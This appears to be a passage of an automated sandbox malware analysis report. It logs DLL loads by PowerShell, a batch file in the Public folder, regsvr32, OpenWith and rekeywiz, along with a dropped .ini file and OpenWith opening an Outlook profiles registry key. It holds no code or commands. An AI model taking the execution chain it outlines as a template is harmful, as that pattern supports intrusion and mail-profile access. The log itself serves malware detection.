                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\Public\ajbs50ul.batSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\Public\ajbs50ul.batSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\Public\ajbs50ul.batSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\Public\ajbs50ul.batSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\Public\ajbs50ul.batSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: msimg32.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: quartz.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: mmdevapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: dsound.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: winmmbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: ksuser.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: avrt.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: qedit.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: audioses.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: msacm32.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: midimap.dllJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wudfplatform.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: mswsock.dll
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: efsadu.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: efsutil.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: cryptui.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: mfc42u.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: logoncli.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: credui.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: feclient.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: msimg32.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: winmm.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: efsadu.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: efsutil.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: cryptui.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: mfc42u.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: logoncli.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: credui.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: feclient.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\rekeywiz.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptnet.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: cabinet.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: devenum.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: winmm.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: msdmo.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\ajbs50ul.batFile written: C:\Users\user\AppData\Roaming\4smg.iniJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\OutlookJump to behavior
                        Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880BF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880F7000.00000004.00000020.00020000.00000000.sdmp
